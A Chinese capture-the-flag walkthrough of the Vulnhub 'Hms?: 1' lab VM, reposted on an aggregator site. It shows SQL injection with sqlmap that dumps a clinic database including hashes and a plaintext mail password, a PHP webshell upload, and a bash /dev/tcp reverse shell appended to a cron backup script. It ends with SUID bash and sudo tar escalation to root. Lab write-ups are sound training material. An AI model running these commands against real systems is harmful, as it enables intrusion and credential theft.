【Vulnhub 靶场】【Hms?: 1】【简单】【20210728】

news2024/11/29 12:40:17

1、环境介绍

靶场介绍:https://www.vulnhub.com/entry/hms-1,728/
靶场下载:https://download.vulnhub.com/hms/niveK.ova
靶场难度:简单
发布日期:2021年07月28日
文件大小:2.9 GB
靶场作者:niveK
靶场系列:Hms?
靶场描述

  • 这与 VirtualBox 而不是 VMware 配合使用效果更好。

打靶耗时:3+ 小时,过程挺简单的,就是比较容易忽略细节。
打靶关键

  1. Web 目录扫描、SQL 注入扫描
  2. HTML 静态审查 与 修改
  3. 制作与上传图片马、BP抓包并修改请求内容
  4. Linux 信息收集、SUID 提权、SUDO 提权

2、主机发现与端口扫描

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.31   08:00:27:58:73:29       PCS Systemtechnik GmbH

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.465 seconds (103.85 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.31        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-12 00:05 EST
Nmap scan report for 192.168.56.31
Host is up (0.00079s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3c:fc:ed:dc:9b:b3:24:ff:2e:c3:51:f8:33:20:78:40 (RSA)
|   256 91:5e:81:68:73:68:65:ec:a2:de:27:19:c6:82:86:a9 (ECDSA)
|_  256 a7:eb:f6:a2:c6:63:54:e1:f5:18:53:fc:c3:e1:b2:28 (ED25519)
7080/tcp open  http    Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/7.3.29 mod_perl/2.0.11 Perl/v5.32.1)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.3.29 mod_perl/2.0.11 Perl/v5.32.1
| http-title: Admin Panel
|_Requested resource was login.php
MAC Address: 08:00:27:58:73:29 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.16 - 4.6 (97%), Linux 3.2 - 4.9 (97%), Linux 4.4 (95%), Linux 3.13 (94%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Linux 5.1 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.79 ms 192.168.56.31

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.88 seconds
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap --script=vuln -p 21,22,7080 192.168.56.31      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-12 00:12 EST
Nmap scan report for 192.168.56.31
Host is up (0.00054s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
7080/tcp open  empowerid
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|       httponly flag not set
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-trace: TRACE is enabled
| http-enum: 
|   /login.php: Possible admin folder
|   /test.php: Test page
|   /files/: Potentially interesting folder w/ directory listing
|   /icons/: Potentially interesting folder w/ directory listing
|_  /pages/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:58:73:29 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 35.16 seconds

3、端口访问

3.1、21端口 - FTP 匿名用户访问

  • 啥也没有,估计用于上传后门的
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.31                    
Connected to 192.168.56.31.
220 (vsFTPd 3.0.3)
Name (192.168.56.31:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||34008|)
150 Here comes the directory listing.
226 Directory send OK.
ftp>

3.2、7080端口 - Web

  • 获取信息
<meta name="keywords" content="Admin , Responsive">
<meta name="author" content="Nikhil Bhalerao +919423979339.">

<!-- for any PHP, Codeignitor or Laravel work contact me at mayuri.infospace@gmail.com -->

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、目录扫描

# 基础小字典,初扫摸底
dirb http://192.168.56.31:7080
# 较全面 conda activate py37
dirsearch -u http://192.168.56.31:7080 -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.56.31:7080" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.31:7080 -lcf
# 常规文件扫描
gobuster dir -u http://192.168.56.31:7080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://192.168.56.31:7080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包,备份扫描
gobuster dir -u http://192.168.56.31:7080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q
  • http://192.168.56.31:7080/index.php
  • http://192.168.56.31:7080/login.php
  • http://192.168.56.31:7080/test.php
  • http://192.168.56.31:7080/footer.php
  • http://192.168.56.31:7080/header.php
  • http://192.168.56.31:7080/head.php
  • http://192.168.56.31:7080/logout.php
  • http://192.168.56.31:7080/profile.php
  • http://192.168.56.31:7080/signup.php
  • http://192.168.56.31:7080/connect.php
  • http://192.168.56.31:7080/sidebar.php
  • http://192.168.56.31:7080/forgot_password.php
  • http://192.168.56.31:7080/cgi-bin/
  • http://192.168.56.31:7080/files/
  • http://192.168.56.31:7080/pages/
  • http://192.168.56.31:7080/phpmyadmin

4.1、cig-bin 目录扫描(没有啥东西)

dirsearch -u http://192.168.56.31:7080/cgi-bin/ -f -e cgi,sh

4.2、phpmyadmin - 目录扫描(啥也没有)

在这里插入图片描述

4.3、test.php

在这里插入图片描述

5、FUZZ

5.1、test.php(失败)

ffuf -u "http://192.168.110.133/dashboard.php?FUZZ" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.110.133/dashboard.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

ffuf -u "http://192.168.110.133/dashboard.php?FUZZ=../../../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.110.133/dashboard.php?FUZZ=../../../../../../../etc/passwd" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 

ffuf -u "http://192.168.110.133/dashboard.php" -d "FUZZ=../../../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.110.133/dashboard.php" -d "FUZZ=../../../../../../../etc/passwd" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

5.2、connect.php(失败)

ffuf -u "http://192.168.56.31:7080/connect.php?FUZZ" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.56.31:7080/connect.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

ffuf -u "http://192.168.56.31:7080/connect.php?FUZZ=../../../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.56.31:7080/connect.php?FUZZ=../../../../../../../etc/passwd" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

ffuf -u "http://192.168.56.31:7080/connect.php" -d "FUZZ=../../../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 2
ffuf -u "http://192.168.56.31:7080/connect.php" -d "FUZZ=../../../../../../../etc/passwd" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -fw 2

6、登录页面

6.1、密码爆破(失败)

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# hydra -l mayuri.infospace@gmail.com -P /usr/share/wordlists/rockyou.txt -f -t 64 -s 7080 192.168.56.31 http-post-form "/login.php:user=admin&email=^USER^&password=^PASS^&btn_login=:Invalid Email or Password"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-12 03:55:10
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-post-form://192.168.56.31:7080/login.php:user=admin&email=^USER^&password=^PASS^&btn_login=:Invalid Email or Password
[STATUS] 12450.00 tries/min, 12450 tries in 00:01h, 14331949 to do in 19:12h, 64 active
[STATUS] 13194.33 tries/min, 39583 tries in 00:03h, 14304816 to do in 18:05h, 64 active
[STATUS] 13431.00 tries/min, 94017 tries in 00:07h, 14250382 to do in 17:42h, 64 active
[STATUS] 12999.62 tries/min, 195211 tries in 00:15h, 14149188 to do in 18:09h, 64 active

6.2、SqlMap

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -o -u "http://192.168.56.31:7080/login.php" --batch -forms --level=3 --risk=3
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -u "http://192.168.56.31:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" --level=3 --risk=3
......
POST parameter 'email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 3710 HTTP(s) requests:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: user=admin&email=mayuri.infospace@gmail.com' OR NOT 7284=7284-- mqNu&password=123&btn_login=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=admin&email=mayuri.infospace@gmail.com' OR (SELECT 4185 FROM(SELECT COUNT(*),CONCAT(0x716b786271,(SELECT (ELT(4185=4185,1))),0x7162786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ASVf&password=123&btn_login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=admin&email=mayuri.infospace@gmail.com' AND (SELECT 5572 FROM (SELECT(SLEEP(5)))CQDF)-- xlcH&password=123&btn_login=
---
[04:38:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.29, Apache 2.4.48, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:38:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.31'

[*] ending @ 04:38:20 /2023-11-12/
  • 其中存在这样一段
[04:37:42] [INFO] testing if POST parameter 'email' is dynamic
[04:37:42] [WARNING] POST parameter 'email' does not appear to be dynamic
[04:37:42] [INFO] heuristic (basic) test shows that POST parameter 'email' might be injectable (possible DBMS: 'MySQL')
[04:37:42] [INFO] testing for SQL injection on POST parameter 'email'
[04:37:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:37:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[04:37:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[04:37:46] [INFO] POST parameter 'email' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --not-string="Login")
  • 上面输出说明「email」存在「万能密码登录」样式为「or 1=1
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -u "http://192.168.56.31:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" --dbs
......
[04:39:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.29, Apache 2.4.48, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:39:16] [INFO] fetching database names
[04:39:17] [INFO] starting 3 threads
[04:39:17] [INFO] retrieved: 'clinic_db'
[04:39:17] [INFO] retrieved: 'phpmyadmin'
[04:39:17] [INFO] retrieved: 'performance_schema'
[04:39:18] [INFO] retrieved: 'information_schema'
[04:39:18] [INFO] retrieved: 'test'
[04:39:18] [INFO] retrieved: 'mysql'
available databases [6]:
[*] clinic_db
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

[04:39:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.31'

[*] ending @ 04:39:18 /2023-11-12/
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -u "http://192.168.56.31:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" -D clinic_db --tables
......
Database: clinic_db
[24 tables]
+----------------------+
| admin                |
| user                 |
| appointment          |
| billing              |
| billing_records      |
| department           |
| doctor               |
| doctor_timings       |
| manage_website       |
| medicine             |
| orders               |
| patient              |
| payment              |
| prescription         |
| prescription_records |
| room                 |
| service_type         |
| tbl_email_config     |
| tbl_permission       |
| tbl_permission_role  |
| tbl_role             |
| tbl_sms_config       |
| treatment            |
| treatment_records    |
+----------------------+

[04:40:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.31'

[*] ending @ 04:40:43 /2023-11-12/
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -u "http://192.168.56.31:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" -D clinic_db --dump-all
......
Database: clinic_db
Table: admin
[1 entry]
+----+------------------------+---------+------------+-------------------------------+-----------------+-------------+-------+------------------------+--------+------------+------------------------------------------------------------------+----------+------------+------------+------------+---------------+
| id | loginid                | role_id | dob        | addr                          | fname           | image       | lname | notes                  | gender | mobileno   | password                                                         | username | created_on | last_login | updated_on | delete_status |
+----+------------------------+---------+------------+-------------------------------+-----------------+-------------+-------+------------------------+--------+------------+------------------------------------------------------------------+----------+------------+------------+------------+---------------+
| 1  | ndbhalerao91@gmail.com | 1       | 2018-11-26 | <p>Maharashtra, India</p>\r\n | Nikhil Bhalerao | profile.jpg | admin | <p>admin panel</p>\r\n | Male   | 9423979339 | aa7f019c326413d5b8bcad4314228bcd33ef557f5d81c7cc977f7728156f4357 | admin    | 2018-04-30 | 0000-00-00 | 2019-10-15 | 0             |
+----+------------------------+---------+------------+-------------------------------+-----------------+-------------+-------+------------------------+--------+------------+------------------------------------------------------------------+----------+------------+------------+------------+---------------+

Database: clinic_db
Table: patient
[1 entry]
+----------------+-----------+------------+--------+--------+---------------------+---------+----------+------------+------------------------------------------------------------------+------------+-------------+---------------+---------------+---------------+
| loginid        | patientid | dob        | city   | gender | address             | pincode | status   | mobileno   | password                                                         | bloodgroup | patientname | admissiondate | admissiontime | delete_status |
+----------------+-----------+------------+--------+--------+---------------------+---------+----------+------------+------------------------------------------------------------------+------------+-------------+---------------+---------------+---------------+
| atul@gmail.com | 1         | 1995-07-25 | nashik | Male   | nashik, maharashtra | 1234    | Active   | 9423979339 | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 | B+         | Atul Petkar | 2020-05-25    | 11:00:00      | 0             |
+----------------+-----------+------------+--------+--------+---------------------+---------+----------+------------+------------------------------------------------------------------+------------+-------------+---------------+---------------+---------------+

Database: clinic_db
Table: tbl_sms_config
[1 entry]
+----+--------------+------------+--------------+-------------------+---------------+
| id | sms_senderid | created_at | sms_password | sms_username      | delete_status |
+----+--------------+------------+--------------+-------------------+---------------+
| 1  | UPTURN       | 2019-10-10 | 123456789    | nikhilbhalerao007 | 0             |
+----+--------------+------------+--------------+-------------------+---------------+

Database: clinic_db
Table: doctor
[1 entry]
+-----------------+----------+--------------+----------+------------+------------------------------------------------------------------+-----------+-----------------+------------+---------------+--------------------+
| loginid         | doctorid | departmentid | status   | mobileno   | password                                                         | education | doctorname      | experience | delete_status | consultancy_charge |
+-----------------+----------+--------------+----------+------------+------------------------------------------------------------------+-----------+-----------------+------------+---------------+--------------------+
| akash@gmail.com | 1        | 1            | Active   | 9423979339 | bbcff4db4d8057800d59a68224efd87e545fa1512dfc3ef68298283fbb3b6358 | MD        | Dr. Akash Ahire | 3.0        | 0             | 200.00             |
+-----------------+----------+--------------+----------+------------+------------------------------------------------------------------+-----------+-----------------+------------+---------------+--------------------+

Database: clinic_db
Table: tbl_role
[3 entries]
+----+-------------+-------------+---------------+
| id | slug        | role_name   | delete_status |
+----+-------------+-------------+---------------+
| 1  | admin       | Admin       | 0             |
| 2  | client      | client      | 0             |
| 3  | technicians | Technicians | 0             |
+----+-------------+-------------+---------------+

Database: clinic_db
Table: tbl_email_config
[1 entry]
+------+---------------------------+-----------+--------------+---------------+---------------------------+-------------------+
| e_id | name                      | mail_port | mail_encrypt | mail_password | mail_username             | mail_driver_host  |
+------+---------------------------+-----------+--------------+---------------+---------------------------+-------------------+
| 1    | Upturn India Technologies | 587       | sdsad        | x(ilz?cWumI2  | contact.info@upturnit.com | mail.upturnit.com |
+------+---------------------------+-----------+--------------+---------------+---------------------------+-------------------+
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -u "http://192.168.56.31:7080/login.php" --data "user=admin&email=mayuri.infospace%40gmail.com&password=123&btn_login=" -D phpmyadmin --dump-all
......
atabase: phpmyadmin
Table: pma__userconfig
[1 entry]
+----------+---------------------+---------------------------------------------------+
| username | timevalue           | config_data                                       |
+----------+---------------------+---------------------------------------------------+
| root     | 2021-07-25 22:05:10 | {"Console\\/Mode":"collapse","NavigationWidth":0} |
+----------+---------------------+---------------------------------------------------+

6.3、使用万能密码登录

在这里插入图片描述
在这里插入图片描述

  • 没有找到任何可以利用的地方

6.5、静态检测HTML发现注释

在这里插入图片描述
在这里插入图片描述

  • 找到有个图片上传

在这里插入图片描述

7、制作图片马

  • 按住图片,拖动到地址栏,即可获取图片地址

在这里插入图片描述

  • 上传成功,并找到地址:http://192.168.56.31:7080/uploadImage/Logo/OIP-C.jpeg

7.1、蚁剑连接失败

在这里插入图片描述

7.2、直接上传 PHP

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

8、Linux 信息收集

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 10086                                
listening on [any] 10086 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.31] 56574
bash: cannot set terminal process group (1298): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ SHELL=/bin/bash script -q /dev/null
SHELL=/bin/bash script -q /dev/null
daemon@nivek:/home/nivek$

8.1、bash ≤ 4.3 存在「Bash破壳漏洞」

8.2、常规信息收集

  • 可疑文件:/home/eren/backup.sh
bash-4.3$ history
history
    1  history
bash-4.3$ whoami
whoami
daemon
bash-4.3$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
bash-4.3$ /usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
bash-4.3$ crontab -l
crontab -l
no crontab for daemon
bash-4.3$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * eren /home/eren/backup.sh
bash-4.3$ hostnamectl
hostnamectl
   Static hostname: nivek
         Icon name: computer-vm
           Chassis: vm
        Machine ID: 99f028fc308708b4fb97c8ab60fd0e7c
           Boot ID: 5d158f2d4c5f46c5949a9e0e697b83fb
    Virtualization: oracle
  Operating System: Ubuntu 16.04 LTS
            Kernel: Linux 4.4.0-21-generic
      Architecture: x86-64
bash-4.3$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
bash-4.3$ echo $BASH_VERSION
echo $BASH_VERSION
4.3.42(1)-release
bash-4.3$

8.3、文件信息收集

  • 获取了三个新建用户:nivekapacheeren

在这里插入图片描述

daemon@nivek:/home/nivek$ ls -al
ls -al
total 104
drwxr-xr-x 16 nivek nivek 4096 Jul 26  2021 .
drwxr-xr-x  4 root  root  4096 Jul 26  2021 ..
-rw-------  1 nivek nivek  425 Jul 26  2021 .bash_history
-rw-r--r--  1 nivek nivek  220 Jul 25  2021 .bash_logout
-rw-r--r--  1 nivek nivek 3771 Jul 25  2021 .bashrc
drwx------ 13 nivek nivek 4096 Jul 26  2021 .cache
drwx------ 14 nivek nivek 4096 Jul 26  2021 .config
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Desktop
-rw-r--r--  1 nivek nivek   25 Jul 25  2021 .dmrc
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Documents
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Downloads
drwx------  2 nivek nivek 4096 Jul 26  2021 .gconf
drwx------  3 nivek nivek 4096 Jul 26  2021 .gnupg
-rw-------  1 nivek nivek  942 Jul 26  2021 .ICEauthority
drwx------  3 nivek nivek 4096 Jul 26  2021 .local
-rw-r--r--  1 root  root    33 Jul 25  2021 local.txt
drwx------  5 nivek nivek 4096 Jul 26  2021 .mozilla
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Music
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Pictures
-rw-r--r--  1 nivek nivek  675 Jul 25  2021 .profile
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Public
-rw-r--r--  1 nivek nivek    0 Jul 25  2021 .sudo_as_admin_successful
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Templates
drwxr-xr-x  2 nivek nivek 4096 Jul 26  2021 Videos
-rw-------  1 nivek nivek   50 Jul 26  2021 .Xauthority
-rw-------  1 nivek nivek 1354 Jul 26  2021 .xsession-errors
-rw-------  1 nivek nivek 1788 Jul 26  2021 .xsession-errors.old
daemon@nivek:/home/nivek$ cat local.txt
cat local.txt
3bbf8c168408f1d5ff9dfd91fc00d0c1
daemon@nivek:/usr/sbin$ cat /home/eren/backup.sh
cat /home/eren/backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
  • 存在eren权限的bash
    • -rwsr-xr-x 1 eren eren 1037464 Jul 26 2021 /usr/bin/bash
daemon@nivek:/usr/sbin$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null
/bin/ping
/bin/mount
/bin/fusermount
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/opt/lampp/bin/suexec
daemon@nivek:/usr/sbin$ find / -user eren -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
<eren -perm -u=s -type f -exec ls -al {} \; 2>/dev/null                      
-rwsr-xr-x 1 eren eren 1037464 Jul 26  2021 /usr/bin/bash

9、越权

daemon@nivek:/usr/sbin$ /usr/bin/bash -p
/usr/bin/bash -p
bash-4.3$ echo "bash -i >& /dev/tcp/192.168.56.3/7777 0>&1" >> /home/eren/backup.sh
</dev/tcp/192.168.56.3/7777 0>&1 >> /home/eren/backup.sh                    
bash-4.3$ cat /home/eren/backup.sh
cat /home/eren/backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
bash -i >& /dev/tcp/192.168.56.3/7777 0>&1
bash-4.3$
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 7777                 
listening on [any] 7777 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.31] 41074
bash: cannot set terminal process group (9314): Inappropriate ioctl for device
bash: no job control in this shell
eren@nivek:~$

10、提权

在这里插入图片描述

eren@nivek:~$ history
history
eren@nivek:~$ sudo -l
sudo -l
Matching Defaults entries for eren on nivek:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User eren may run the following commands on nivek:
    (root) NOPASSWD: /bin/tar
eren@nivek:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
</dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash       
tar: Removing leading `/' from member names
SHELL=/bin/bash script -q /dev/null
root@nivek:~# cd /root
cd /root
root@nivek:/root# ls -al
ls -al
total 136
drwx------ 19 root root  4096 Jul 26  2021 .
drwxr-xr-x 23 root root  4096 Nov 12 15:10 ..
-rw-------  1 root root  2377 Jul 26  2021 .bash_history
-rw-r--r--  1 root root  3121 Jul 26  2021 .bashrc
drwx------ 11 root root  4096 Jul 26  2021 .cache
drwx------ 13 root root  4096 Jul 25  2021 .config
drwx------  3 root root  4096 Jul 25  2021 .dbus
drwxr-xr-x  3 root root 20480 Jul 25  2021 Desktop
drwxr-xr-x  2 root root  4096 Jul 25  2021 Documents
drwxr-xr-x  2 root root 20480 Jul 25  2021 Downloads
drwx------  2 root root  4096 Jul 25  2021 .gconf
drwx------  2 root root  4096 Jul 25  2021 .gvfs
-rw-------  1 root root   318 Jul 25  2021 .ICEauthority
drwxr-xr-x  3 root root  4096 Jul 25  2021 .local
drwx------  5 root root  4096 Jul 25  2021 .mozilla
drwxr-xr-x  2 root root  4096 Jul 25  2021 Music
drwxr-xr-x  2 root root  4096 Jul 25  2021 .nano
drwxr-xr-x  2 root root  4096 Jul 25  2021 Pictures
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
drwxr-xr-x  2 root root  4096 Jul 25  2021 Public
-rw-------  1 root root    33 Jul 25  2021 root.txt
-rw-r--r--  1 root root    66 Jul 26  2021 .selected_editor
drwxr-xr-x  2 root root  4096 Jul 25  2021 Templates
drwxr-xr-x  3 root root  4096 Jul 25  2021 .thumbnails
drwxr-xr-x  2 root root  4096 Jul 25  2021 Videos
-rw-------  1 root root     0 Jul 26  2021 .Xauthority
-rw-------  1 root root   341 Jul 25  2021 .xsession-errors
root@nivek:/root# cat root.txt
cat root.txt
299c10117c1940f21b70a391ca125c5d

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1341093.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

使用react+vite开发项目时候,部署上线后刷新页面无法访问解决办法

说一下我这边的环境和使用的路由模式&#xff1a;vitereactBrowserRouter路由模式&#xff0c;所以如果你和我一样的话&#xff0c;可以试试我的这种解决办法&#xff0c;我是将项目打包后直接丢到服务器上的目录里面&#xff0c;然后配置nginx直接访问根目录。 我的nginx配置…

总埋怨内娱没有舞台,但打歌节目为什么没人看?

内娱又一档打歌节目停播了&#xff0c;优酷的《朝阳打歌中心》还是没能挺过2023年。 12月24日最后一期节目播出之后&#xff0c;《朝阳打歌中心第二季》就正式收官了&#xff0c;原定将录制到明年2月份却突然提前停播&#xff0c;无论是参演歌手还是观众都感到无比惊讶和不舍。…

